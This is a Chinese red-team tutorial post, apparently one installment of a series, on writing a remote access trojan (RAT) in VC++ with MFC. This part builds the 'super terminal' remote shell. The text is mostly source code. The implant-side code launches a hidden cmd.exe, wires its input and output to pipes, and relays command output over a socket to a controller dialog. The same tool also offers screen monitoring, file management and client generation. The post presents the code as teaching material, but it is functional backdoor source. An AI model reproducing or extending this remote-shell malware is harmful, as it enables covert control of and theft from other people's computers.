红队专题-从零开始VC++C/S远程控制软件RAT-MFC-超级终端
红队专题
- 招募六边形战士队员
- [16]超级终端(1)
- 消息 宏的定义映射
- cmdshell.cpp重载 构造函数
- Onsize 随窗口大小事件
- 回车键发送命令
- 添加字符转换类 StringToTransform
- [17]超级终端(2)
- 接受命令
- 创建m_cmd c++类
- 发送 接收
- 客户端
- 远端进程关闭
招募六边形战士队员
一起学习 代码审计、安全开发、web攻防、逆向等。。。
私信联系
[16]超级终端(1)
进程间通信
添加命令执行窗体
IDD_CMDSHELL
Resizing 边框
两个edit 控件
read only客户端 远端发送开启cmd命令 OPEN_CMD(#define OPEN_CMD 0x01) 服务端 1.创建管道 --- 建立连接客户端 net user 2.服务端 接受命令 ---通过通道(net user)---> 送入CMD进程 ---通过管道guest---> 服务端服务端 发送回显
客户端 --- 接收回显MFC类
添加变量 m_recv m_send重写cmdshell oninitdialog事件
BOOL CCmdShell::OnInitDialog()
{CDialog::OnInitDialog();// TODO: 在此添加额外的初始化GetClientRect(&m_rect);MSGINFO msg;memset(&msg,0,sizeof(MSGINFO));msg.Msg_id = CMDSHELL; // 命令idif(m_Mysock.SendCommand(m_sock,(char*)&msg,sizeof(msg))==SOCKET_ERROR){MessageBox(_T("启用CMD命令发送失败"),_T("错误"),MB_OK|MB_ICONINFORMATION);}return TRUE; // return TRUE unless you set the focus to a control// 异常: OCX 属性页应返回 FALSE
}cmdshell.h 添加在 itemdata.h下主dlg文件
private:void OnCmdShell(); 头文件声明void CClientDlg::OnCmdShell() //超级终端
{CItemData *t;t = GetSelItemInfo();if(t == NULL){return;}else{t->RunToCmdShell();}
}itemdata cpp hvoid CItemData::RunToCmdShell()
{if(m_cmd == NULL){m_cmd = new CCmdShell(this,m_sock);m_cmd->Create(IDD_CMDSHELL,this);m_cmd->ShowWindow(SW_NORMAL); // 显示窗口}else{m_cmd->SetActiveWindow(); // 置前}
}public:void RunToCmdShell();CCmdShell *m_cmd; // 命令对话框窗体的指针CItemData::CItemData(UINT id,SOCKET sock,SOCKADDR_IN *addr,HWND m_hWnd)
{
m_cmd = NULL;消息 宏的定义映射
BEGIN_MESSAGE_MAP(CClientDlg, CDialog)ON_WM_PAINT()ON_WM_QUERYDRAGICON()//主机消息ON_MESSAGE(ID_ONLINE,OnAddHost)ON_MESSAGE(ID_OFFLINE,OnOffLine)//按钮消息ON_COMMAND(ID_FILE_MANAGER,OnFileManager)ON_COMMAND(ID_SCREEN,OnScreen)ON_COMMAND(ID_CMDSHELL,OnCmdShell)ON_COMMAND(ID_TASK,OnTask)ON_COMMAND(ID_BUILD,OnBuild)//}}AFX_MSG_MAPON_WM_SIZE()ON_WM_CLOSE()
END_MESSAGE_MAP()#define ID_CMDSHELL 1003const UINT t[10] = {1001,1002,1003,1004,1005,1006,0,1007,1008,1009};m_toolbar.CreateEx(this);m_toolbar.SetButtons(t,10);m_toolbar.SetSizes(CSize(60,56),CSize(24,24));m_toolbar.SetButtonText(0,_T("文件管理"));m_toolbar.SetButtonText(1,_T("屏幕监控"));m_toolbar.SetButtonText(2,_T("超级终端"));m_toolbar.SetButtonText(3,_T("进程管理"));m_toolbar.SetButtonText(4,_T("服务管理"));m_toolbar.SetButtonText(5,_T("卸载主机"));m_toolbar.SetButtonText(7,_T("生成客户"));m_toolbar.SetButtonText(8,_T("程序设置"));m_toolbar.SetButtonText(9,_T("关于软件"));m_toolbar.GetToolBarCtrl().SetImageList(&m_imagelist);
cmdshell.cpp重载 构造函数
BEGIN_MESSAGE_MAP(CCmdShell, CDialog)ON_WM_SIZE()ON_WM_CLOSE()
END_MESSAGE_MAP()CCmdShell::CCmdShell(CWnd* pParent /*=NULL*/,SOCKET sock): CDialog(CCmdShell::IDD, pParent)
{m_sock = sock;
}头文件定义
#include "MySocket.h"
#include "Common.h"public://CCmdShell(CWnd* pParent = NULL); // 标准构造函数CCmdShell(CWnd* pParent = NULL,SOCKET sock = NULL); // 标准构造函数virtual ~CCmdShell();private:SOCKET m_sock;CRect m_rect;MSGINFO msg;CMySocket m_Mysock;
开启命令功能 common.h 标识
#define CMDSHELL 0x0A
Onsize 随窗口大小事件
public:afx_msg void OnSize(UINT nType, int cx, int cy);void CCmdShell::OnSize(UINT nType, int cx, int cy)
{CDialog::OnSize(nType, cx, cy);// TODO: 在此处添加消息处理程序代码if(nType == SIZE_MINIMIZED){return;}CWnd *pWnd,*pWnd1;pWnd = GetDlgItem(IDC_EDIT1); //获取控件句柄pWnd1 = GetDlgItem(IDC_EDIT2);if(pWnd && pWnd1)//判断是否为空,因为对话框创建时会调用此函数,而当时控件还未创建{CRect rect,rect_l; //获取控件变化前大小GetClientRect(&rect_l);pWnd->GetWindowRect(&rect);ScreenToClient(&rect);rect.right = rect.right + (rect_l.right - m_rect.right);rect.bottom= rect.bottom + (rect_l.bottom - m_rect.bottom);pWnd->MoveWindow(rect);//设置控件大小pWnd1->GetWindowRect(&rect);ScreenToClient(&rect);rect.top = rect.top + (rect_l.bottom - m_rect.bottom);rect.right = rect.right + (rect_l.right - m_rect.right);rect.bottom= rect.bottom + (rect_l.bottom - m_rect.bottom);pWnd1->MoveWindow(rect);//设置控件大小}else{delete pWnd;}GetClientRect(&m_rect);
}回车键发送命令
public:virtual BOOL PreTranslateMessage(MSG* pMsg);
BOOL CCmdShell::PreTranslateMessage(MSG* pMsg)
{// TODO: 在此添加专用代码和/或调用基类if(pMsg->message==WM_KEYDOWN) { int nVirtKey = (int)pMsg->wParam;if(nVirtKey==VK_RETURN) {//发送消息if(m_send.GetSafeHwnd()==::GetFocus()) // 输入框 句柄 焦点 获取控件窗口 光标在输入框里{if(GetDlgItem(IDC_EDIT2)->GetWindowTextLengthW() == 0) //文本长度为零{return TRUE;}CString str;GetDlgItem(IDC_EDIT2)->GetWindowTextW(str); // 宽字节获取字符串 msg.Msg_id = COMMAND;CMD cmd; // 获取cmd 结构体memset(&cmd,0,sizeof(CMD));memset(&msg,0,sizeof(MSGINFO));m_str.CStringToChar(str,cmd.command); // 宽字符 转成 多字节if(strcmp(cmd.command,"exit")==0) // 进程退出{SendMessageW(WM_CLOSE,0,0); // 关闭当前窗体return TRUE;}msg.Msg_id = COMMAND;strcat_s((char*)cmd.command,sizeof(cmd.command),"\r\n"); // 回车 换行memcpy(msg.context,&cmd,sizeof(CMD));m_Mysock.SendCommand(m_sock,(char*)&msg,sizeof(msg));GetDlgItem(IDC_EDIT2)->SetWindowTextW(_T("")); // 清零str.ReleaseBuffer(); }return TRUE;}else if(nVirtKey==VK_ESCAPE){return TRUE;}}return CDialog::PreTranslateMessage(pMsg); //消息传给下一层
}common头文件 同时 server端同步
cmd 结构体
typedef struct tagCMD //CMD命令信息
{int flag; //保留标志 char command[1024];
}CMD;#define COMMAND 0x0B
cmdshell 头文件
#include "StringToTransform.h"private:CStringToTransform m_str;
添加字符转换类 StringToTransform
#include "StdAfx.h"
#include "StringToTransform.h"CStringToTransform::CStringToTransform(void)
{
}CStringToTransform::~CStringToTransform(void)
{
}void CStringToTransform::CStringToChar(CString str,char* w)
{int len = WideCharToMultiByte(CP_ACP,0,str,str.GetLength(),NULL,0,NULL,NULL);WideCharToMultiByte(CP_ACP,0,str,str.GetLength(),w,len,NULL,NULL);w[len] = '\0';
}wchar_t* CStringToTransform::CharToCString(char* temp) //替换
{DWORD dwNum = MultiByteToWideChar (CP_ACP, 0, temp, -1, NULL, 0);wchar_t *pwText;pwText = new wchar_t[dwNum];if(!pwText){delete []pwText;}MultiByteToWideChar (CP_ACP, 0, temp, -1, pwText, dwNum);return pwText;
}#pragma onceclass CStringToTransform
{
public:CStringToTransform(void);~CStringToTransform(void);void CStringToChar(CString str,char* w);wchar_t* CharToCString(char* temp);
};[17]超级终端(2)
服务端的相关操作
接受命令
threadmain cpp
case CMDSHELL:{printf("CmeShell\n");m_cmd.Cmd_GetSock(l_Socket);::CloseHandle(CreateThread(0,0,SendCmd,(LPVOID)&m_cmd,0,0)); // 读 防止阻塞Sleep(200);::CloseHandle(CreateThread(0,0,InitCmd,(LPVOID)&m_cmd,0,0));}break;case COMMAND:{CMD recvcmd;char recv_buff[1024];memset(&recvcmd,0,sizeof(CMD));memcpy(&recvcmd,msg.context,sizeof(CMD));memset(recv_buff,0,sizeof(recv_buff));strcpy_s(recv_buff,1024,recvcmd.command);// if(m_task.ExistTask(m_cmd.GetProcID()) == false)// {// m_cmd.NoTaskExit(l_Socket);// break;// } m_cmd.Cmd_Recv(recv_buff);}break;建立两条管道
创建m_cmd c++类
#pragma onceclass CCmdShell
{
public:CCmdShell(void);~CCmdShell(void);void Cmd_Init();void Cmd_Recv(char recv_buff[1024]);void Cmd_Send();DWORD GetProcID();void Cmd_GetSock(SOCKET sock);void NoTaskExit(SOCKET Socket);
private:SOCKET m_sock_cmd;CMySocket m_sock;HANDLE hReadPipe, hWritePipe, hWriteFile, hReadFile;PROCESS_INFORMATION pi;STARTUPINFO si;
};threadmain h
#include "CmdShell.h"
private:CCmdShell m_cmd; static DWORD WINAPI SendCmd(LPVOID self);static DWORD WINAPI InitCmd(LPVOID self);threadmain cppDWORD WINAPI CThreadMain::SendCmd(LPVOID self)
{CCmdShell* t = (CCmdShell*)self;t->Cmd_Send();return 0;
}DWORD WINAPI CThreadMain::InitCmd(LPVOID self)
{CCmdShell* t = (CCmdShell*)self;t->Cmd_Init();return 0;
}发送 接收
void CCmdShell::Cmd_Init()
{//初始化GetStartupInfoW(&si);// 新进程窗口显示方式和标准输入输出句柄的指定si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; //使cmd的输入输出和管道关联 si.hStdInput = hReadPipe;si.hStdError = hWritePipe;si.hStdOutput = hWritePipe;si.wShowWindow = SW_HIDE;wchar_t cmdline[256]={0};//得到系统路径GetSystemDirectory(cmdline,sizeof(cmdline)); // 获取系统目录wcscat_s(cmdline,_T("\\cmd.exe"));//创建cmd进程if (CreateProcess(cmdline, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi) == 0){printf("CreateProcess Error\n");}::CloseHandle(pi.hProcess); // 关闭句柄
}void CCmdShell::Cmd_Send()
{//发送命令SECURITY_ATTRIBUTES sa;DWORD len;char send_buff[1024];sa.nLength = sizeof(SECURITY_ATTRIBUTES);sa.lpSecurityDescriptor = NULL;sa.bInheritHandle = TRUE;CreatePipe(&hReadFile,&hWritePipe,&sa,0); // 创建通道 读发 传递cmd进程 SECURITY_ATTRIBUTES sa_r;sa_r.nLength = sizeof(SECURITY_ATTRIBUTES);sa_r.lpSecurityDescriptor = NULL;sa_r.bInheritHandle = TRUE;//创建管道CreatePipe(&hReadPipe,&hWriteFile,&sa_r,0);MSGINFO_S msg;memset(&msg,0,sizeof(MSGINFO_S));msg.Msg_id = CMDSHELL;while (true){//读取管道中的数据memset(send_buff,0,sizeof(send_buff)); // 阻塞的函数if(ReadFile(hReadFile,send_buff,1023,&len,NULL) == FALSE) //结束cmd{break;}//把管道中的数据发送给远程主机CMD cmd;memset(&cmd,0,sizeof(CMD));strcpy_s(cmd.command,sizeof(send_buff),send_buff);cmd.flag = 0;memcpy(msg.context,&cmd,sizeof(CMD));m_sock.MySend(m_sock_cmd,(char*)&msg,sizeof(MSGINFO_S));}printf("CmdThreadOver\n");
}void CCmdShell::Cmd_Recv(char recv_buff[1024])
{DWORD nByteWritten;if(strcmp("exit\r\n",recv_buff)==0){::CloseHandle(hWritePipe);::CloseHandle(hReadPipe);}WriteFile(hWriteFile,recv_buff,strlen(recv_buff),&nByteWritten,NULL);
}cmdshell h
#include "Common.h"
#include "Mysocket.h"void CCmdShell::Cmd_GetSock(SOCKET sock)
{m_sock_cmd = sock;
}客户端
itemdata case CMDSHELL:{if(m_cmd == NULL){break;}CMD t;memset(&t,0,sizeof(CMD));memcpy(&t,msg.context,sizeof(CMD));m_cmd->GetReturnInfo(t);}break;cmdshell hpublic:void GetReturnInfo(CMD t);多字节 转换 宽字符 显示
void CCmdShell::GetReturnInfo(CMD t)
{if(t.flag == 0){CString tem;wchar_t *pwText;pwText = m_str.CharToCString(t.command);m_recv.GetWindowTextW(tem);m_recv.SetWindowTextW(tem + pwText);m_recv.SetSel(-1); // 最后字符 的 下一个 字符 delete[] pwText;m_send.GetFocus();}else{MessageBox(_T("服务端CMD进程被意外结束"),_T("提示"),MB_OK|MB_ICONWARNING);SendMessageW(WM_CLOSE,0,0);}
}远端进程关闭
public:afx_msg void OnSize(UINT nType, int cx, int cy);virtual BOOL PreTranslateMessage(MSG* pMsg);afx_msg void OnClose();#include "ItemData.h"
void CCmdShell::OnClose()
{// TODO: 在此添加消息处理程序代码和/或调用默认值MSGINFO msg;CMD cmd;memset(&msg,0,sizeof(MSGINFO));memset(&cmd,0,sizeof(CMD));msg.Msg_id = COMMAND;strcpy_s((char*)cmd.command,sizeof("exit\r\n"),"exit\r\n");memcpy(msg.context,&cmd,sizeof(CMD));m_Mysock.SendCommand(m_sock,(char*)&msg,sizeof(msg));//CDialog::OnClose();((CItemData*)this->m_pParentWnd)->m_cmd = NULL; // 防止多开 getreturninfoDestroyWindow(); // 销毁窗体delete this; // 删除创建这个类
}mutilline
vertical scrollprivate: static unsigned int __stdcall OnCmdRecv(LPVOID self);void OnCmdRecv_run();GetClientRect(&m_rect);MSGINFO msg;memset(&msg,0,sizeof(MSGINFO));msg.Msg_id = CMDSHELL;if(m_Mysock.SendCommand(m_sock,(char*)&msg,sizeof(msg))==SOCKET_ERROR){MessageBox(_T("启用CMD命令发送失败"),_T("错误"),MB_OK|MB_ICONINFORMATION);}